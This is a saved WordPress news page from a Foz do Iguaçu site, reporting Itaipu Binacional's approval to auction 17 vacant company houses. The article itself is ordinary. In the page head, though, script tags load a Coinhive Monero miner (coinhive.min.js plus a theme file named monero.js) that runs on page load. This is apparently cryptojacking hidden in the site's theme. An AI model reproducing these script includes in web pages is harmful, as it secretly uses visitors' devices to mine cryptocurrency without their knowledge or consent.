

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-5NH0WLB29C"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-5NH0WLB29C');
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://iguassunews.com/xmlrpc.php" />
<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	<!-- This site is optimized with the Yoast SEO plugin v15.9.2 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Imóveis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE -</title>
	<link rel="canonical" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/" />
	<meta property="og:locale" content="pt_BR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Imóveis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE -" />
	<meta property="og:description" content="Itaipu Binacional aprovou na quinta-feira (18) o leilão do primeiro lote de casas residenciais dos bairros Itaipu A (antiga Vila A) e Itaipu B (Vila B), em Foz do Iguaçu." />
	<meta property="og:url" content="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/" />
	<meta property="article:published_time" content="2021-03-20T09:16:00+00:00" />
	<meta property="article:modified_time" content="2021-03-20T02:53:35+00:00" />
	<meta property="og:image" content="https://i1.wp.com/iguassunews.com/wp-content/uploads/2019/08/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847.jpg?fit=560%2C374&#038;ssl=1" />
	<meta property="og:image:width" content="560" />
	<meta property="og:image:height" content="374" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:label1" content="Written by">
	<meta name="twitter:data1" content="Editor">
	<meta name="twitter:label2" content="Est. reading time">
	<meta name="twitter:data2" content="1 minuto">
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://iguassunews.com/#website","url":"http://iguassunews.com/","name":"Oiguassu","description":"","potentialAction":[{"@type":"SearchAction","target":"http://iguassunews.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","@id":"https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/#primaryimage","inLanguage":"pt-BR","url":"https://i1.wp.com/iguassunews.com/wp-content/uploads/2019/08/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847.jpg?fit=560%2C374&ssl=1","width":560,"height":374},{"@type":"WebPage","@id":"https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/#webpage","url":"https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/","name":"Im\u00f3veis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE -","isPartOf":{"@id":"http://iguassunews.com/#website"},"primaryImageOfPage":{"@id":"https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/#primaryimage"},"datePublished":"2021-03-20T09:16:00+00:00","dateModified":"2021-03-20T02:53:35+00:00","author":{"@id":"http://iguassunews.com/#/schema/person/0147845c3ca084b9391607de34da7aca"},"breadcrumb":{"@id":"https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/"]}]},{"@type":"BreadcrumbList","@id":"https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"item":{"@type":"WebPage","@id":"https://iguassunews.com/","url":"https://iguassunews.com/","name":"In\u00edcio"}},{"@type":"ListItem","position":2,"item":{"@type":"WebPage","@id":"https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/","url":"https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/","name":"Im\u00f3veis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE"}}]},{"@type":"Person","@id":"http://iguassunews.com/#/schema/person/0147845c3ca084b9391607de34da7aca","name":"Editor","image":{"@type":"ImageObject","@id":"http://iguassunews.com/#personlogo","inLanguage":"pt-BR","url":"https://secure.gravatar.com/avatar/06f516c39c432ecb88827893c2662617?s=96&d=mm&r=g","caption":"Editor"},"sameAs":["https://oiguassu.com/"]}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel='dns-prefetch' href='//i1.wp.com' />
<link rel='dns-prefetch' href='//i2.wp.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel='dns-prefetch' href='//widgets.wp.com' />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//0.gravatar.com' />
<link rel='dns-prefetch' href='//1.gravatar.com' />
<link rel='dns-prefetch' href='//2.gravatar.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para  &raquo;" href="https://iguassunews.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo;" href="https://iguassunews.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo; Imóveis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/iguassunews.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.7"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://iguassunews.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1615694943' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mh-style-css'  href='https://iguassunews.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='https://iguassunews.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://c0.wp.com/p/jetpack/9.5/_inc/social-logos/social-logos.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://c0.wp.com/p/jetpack/9.5/css/jetpack.css' type='text/css' media='all' />
<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/related-posts/related-posts.min.js' id='jetpack_related-posts-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.7/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.7/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://iguassunews.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=5.7' id='mh-scripts-js'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=5.7' id='monero-js'></script>
<script type='text/javascript' src='https://iguassunews.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=5.7' id='monero2-js'></script>
<link rel="https://api.w.org/" href="https://iguassunews.com/wp-json/" /><link rel="alternate" type="application/json" href="https://iguassunews.com/wp-json/wp/v2/posts/32711" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://iguassunews.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://iguassunews.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.7" />
<link rel='shortlink' href='https://wp.me/pS5BS-8vB' />
<link rel="alternate" type="application/json+oembed" href="https://iguassunews.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Figuassunews.com%2Fimoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://iguassunews.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Figuassunews.com%2Fimoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #0f7200; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #0f7200; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #0f7200; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="https://iguassunews.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/amp/"><link rel="icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=32%2C32&#038;ssl=1" sizes="32x32" />
<link rel="icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=192%2C192&#038;ssl=1" sizes="192x192" />
<link rel="apple-touch-icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=180%2C180&#038;ssl=1" />
<meta name="msapplication-TileImage" content="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=270%2C270&#038;ssl=1" />
			<style type="text/css" id="wp-custom-css">
				.logo-wrap img{
	width:100%
}			</style>
		</head>
<body class="post-template-default single single-post postid-32711 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="https://iguassunews.com/" title="" rel="home">
<div class="logo-wrap" role="banner">
<img src="https://iguassunews.com/wp-content/uploads/2021/01/cropped-cropped-marco-das-tres-fronteiras-1024x576-3.jpeg" height="351" width="879" alt="" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu"><ul>
<li class="page_item page-item-2"><a href="https://iguassunews.com/about/">About</a></li>
<li class="page_item page-item-7"><a href="https://iguassunews.com/">Home</a></li>
</ul></div>
		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/tribuna-livre-yasmin-quer-psicologos-e-assistentes-sociais-nas-escolas-de-foz/" title="Coluna Tribuna Livre: CÂMARA QUESTIONA ATRASO NA OBRA DA UNIDADE DE SAÚDE DE TRÊS LAGOAS">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Coluna Tribuna Livre: CÂMARA QUESTIONA ATRASO NA OBRA DA UNIDADE DE SAÚDE DE TRÊS LAGOAS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/ruta-corredor-de-exportacion-entre-alto-parana-e-itapua-con-83-de-avance/" title="Ruta: CORREDOR DE EXPORTACIÓN ENTRE ALTO PARANÁ E ITAPÚA CON 83% DE AVANCE">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Ruta: CORREDOR DE EXPORTACIÓN ENTRE ALTO PARANÁ E ITAPÚA CON 83% DE AVANCE</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/un-ano-de-cuarentena-cuales-son-los-problemas-sanitarios-que-enfrentara-el-pais-ante-una-posible-segunda-ola/" title="Un año de cuarentena: ¿CUÁLES SON LOS PROBLEMAS SANITARIOS QUE ENFRENTARÁ EL PAÍS ANTE UNA POSIBLE SEGUNDA OLA?">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Un año de cuarentena: ¿CUÁLES SON LOS PROBLEMAS SANITARIOS QUE ENFRENTARÁ EL PAÍS ANTE UNA POSIBLE SEGUNDA OLA?</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/" title="Imóveis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Imóveis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/escassez-governo-federal-requisita-todo-o-estoque-de-medicamentos-usados-para-intubar-pacientes/" title="Escassez: GOVERNO FEDERAL REQUISITA TODO O ESTOQUE DE MEDICAMENTOS USADOS PARA INTUBAR PACIENTES">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Escassez: GOVERNO FEDERAL REQUISITA TODO O ESTOQUE DE MEDICAMENTOS USADOS PARA INTUBAR PACIENTES</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/deus-nos-libertou-da-escravidao/" title="DEUS NOS LIBERTOU DA ESCRAVIDÃO!">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">DEUS NOS LIBERTOU DA ESCRAVIDÃO!</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/vereador-maninho-destaca-como-prioridades-o-esporte-o-social-o-turismo-e-a-retomada-economica-de-foz/" title="VEREADOR MANINHO DESTACA COMO PRIORIDADES O ESPORTE, O SOCIAL, O TURISMO E A RETOMADA ECONÔMICA DE FOZ">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">VEREADOR MANINHO DESTACA COMO PRIORIDADES O ESPORTE, O SOCIAL, O TURISMO E A RETOMADA ECONÔMICA DE FOZ</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/governo-ratinho-foz-fica-em-segundo-plano-na-lista-da-sesa-para-receber-leitos-de-uti/" title="Governo Ratinho: FOZ FICA EM SEGUNDO PLANO NA LISTA DA SESA PARA RECEBER LEITOS DE UTI">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Governo Ratinho: FOZ FICA EM SEGUNDO PLANO NA LISTA DA SESA PARA RECEBER LEITOS DE UTI</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/sem-estoque-com-requisicao-do-sus-hospitais-privados-tem-medicamentos-de-intubacao-para-apenas-48-horas/" title="Sem estoque: COM REQUISIÇÃO DO SUS, HOSPITAIS PRIVADOS TÊM MEDICAMENTOS DE INTUBAÇÃO PARA APENAS 48 HORAS">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Sem estoque: COM REQUISIÇÃO DO SUS, HOSPITAIS PRIVADOS TÊM MEDICAMENTOS DE INTUBAÇÃO PARA APENAS 48 HORAS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/investigacion-la-justicia-peruana-prohibe-al-expresidente-vizcarra-hablar-con-la-prensa-y-salir-de-lima/" title="Investigación: LA JUSTICIA PERUANA PROHÍBE AL EXPRESIDENTE VIZCARRA HABLAR CON LA PRENSA Y SALIR DE LIMA">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Investigación: LA JUSTICIA PERUANA PROHÍBE AL EXPRESIDENTE VIZCARRA HABLAR CON LA PRENSA Y SALIR DE LIMA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/mercosul-brasil-quer-reduzir-em-10-todas-as-tarifas-de-importacao/" title="Mercosul: BRASIL QUER REDUZIR EM 10% TODAS AS TARIFAS DE IMPORTAÇÃO">
					<span class="ticker-item-date">março 20, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Mercosul: BRASIL QUER REDUZIR EM 10% TODAS AS TARIFAS DE IMPORTAÇÃO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/lockdown-foz-do-iguacu-tera-mais-um-toque-de-recolher-a-partir-das-18h-de-sabado-20/" title="Lockdown: FOZ DO IGUAÇU TERÁ MAIS UM TOQUE DE RECOLHER A PARTIR DAS 18H DE SÁBADO, 20">
					<span class="ticker-item-date">março 19, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Lockdown: FOZ DO IGUAÇU TERÁ MAIS UM TOQUE DE RECOLHER A PARTIR DAS 18H DE SÁBADO, 20</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/a-paz-do-senhor-excede-o-entendimento-humano/" title="A PAZ DO SENHOR EXCEDE O ENTENDIMENTO HUMANO!">
					<span class="ticker-item-date">março 19, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">A PAZ DO SENHOR EXCEDE O ENTENDIMENTO HUMANO!</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/na-crise-sanepar-parcela-dividas-de-clientes-em-ate-60-meses/" title="Pandemia: SANEPAR PARCELA DÍVIDAS DE CLIENTES EM ATÉ 60 MESES">
					<span class="ticker-item-date">março 19, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: SANEPAR PARCELA DÍVIDAS DE CLIENTES EM ATÉ 60 MESES</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://iguassunews.com/conselho-tem-eleicao-hoje-codefoz-e-essencial-para-a-uniao-e-o-dialogo-pelo-desenvolvimento-de-foz/" title="Conselho tem eleição hoje: CODEFOZ É ESSENCIAL PARA A UNIÃO E O DIÁLOGO PELO DESENVOLVIMENTO DE FOZ">
					<span class="ticker-item-date">março 19, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Conselho tem eleição hoje: CODEFOZ É ESSENCIAL PARA A UNIÃO E O DIÁLOGO PELO DESENVOLVIMENTO DE FOZ</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="https://iguassunews.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://iguassunews.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://iguassunews.com/category/extra/" itemprop="url"><span itemprop="title">Extra</span></a></span></nav>
<article id="post-32711" class="post-32711 post type-post status-publish format-standard has-post-thumbnail hentry category-extra category-foz tag-imoveis tag-itaipu tag-vila-a tag-vila-b">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			Imóveis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="https://iguassunews.com/tag/imoveis/" rel="tag">imóveis</a><a href="https://iguassunews.com/tag/itaipu/" rel="tag">Itaipu</a><a href="https://iguassunews.com/tag/vila-a/" rel="tag">Vila A</a><a href="https://iguassunews.com/tag/vila-b/" rel="tag">Vila B</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="560" height="374" src="https://i1.wp.com/iguassunews.com/wp-content/uploads/2019/08/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847.jpg?resize=560%2C374&amp;ssl=1" class="attachment-content-single size-content-single wp-post-image" alt="" loading="lazy" srcset="https://i1.wp.com/iguassunews.com/wp-content/uploads/2019/08/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847.jpg?w=560&amp;ssl=1 560w, https://i1.wp.com/iguassunews.com/wp-content/uploads/2019/08/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847.jpg?resize=300%2C200&amp;ssl=1 300w" sizes="(max-width: 560px) 100vw, 560px" data-attachment-id="19895" data-permalink="https://iguassunews.com/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847/" data-orig-file="https://i1.wp.com/iguassunews.com/wp-content/uploads/2019/08/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847.jpg?fit=560%2C374&amp;ssl=1" data-orig-size="560,374" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847" data-image-description="" data-medium-file="https://i1.wp.com/iguassunews.com/wp-content/uploads/2019/08/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847.jpg?fit=300%2C200&amp;ssl=1" data-large-file="https://i1.wp.com/iguassunews.com/wp-content/uploads/2019/08/itaipu-suspende-desocupacao-de-casas-da-vila-a-e-aumento-da-taxa-de-cessao-5d5da69359847.jpg?fit=560%2C374&amp;ssl=1" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="https://iguassunews.com/author/editor/">Editor</a></span>
<span class="entry-meta-date updated">março 20, 2021</span>
</p>
	<div class="entry-content clearfix">
		<h3 style="text-align: justify;"><strong>Itaipu Binacional aprovou na quinta-feira (18) o leilão do primeiro lote de casas residenciais dos bairros Itaipu A (antiga Vila A) e Itaipu B (Vila B), em Foz do Iguaçu.</strong></h3>
<p style="text-align: justify;">A autorização ocorreu em Reunião de Diretoria Executiva (RDE), com a participação de diretores brasileiros e paraguaios. Neste primeiro lote, foram incluídos 17 imóveis desocupados. O próximo passo será comunicar a decisão da RDE à Eletrobras (no Brasil) e à Ande (Administración Nacional de Electricidad, no Paraguai), para emissão de parecer. Conforme o Tratado de Itaipu, toda alienação de bens da empresa requer autorização das duas estatais.</p>
<p style="text-align: justify;">Após a autorização de Eletrobras e Ande, será aberto o processo de licitação para contratação do leiloeiro oficial. Somente depois da contratação do leiloeiro é que será publicado o edital para a venda dessas casas, com detalhamento de datas, valores e condições de aquisição. A Itaipu estima que essa publicação ocorra ainda neste semestre.</p>
<p style="text-align: justify;">Ainda em estudo, a alienação das demais casas – ocupadas ou cedidas a entidades – será feita somente depois da conclusão do primeiro processo e com ampla divulgação. Esta etapa ainda não tem previsão de realização.</p>
<h6 style="text-align: right;">(Da redação com assessoria Itaipu)</h6>
<p> </p>
<p> </p>
<p> </p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-32711" class="share-twitter sd-button share-icon no-text" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-32711" class="share-facebook sd-button share-icon no-text" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/?share=telegram" 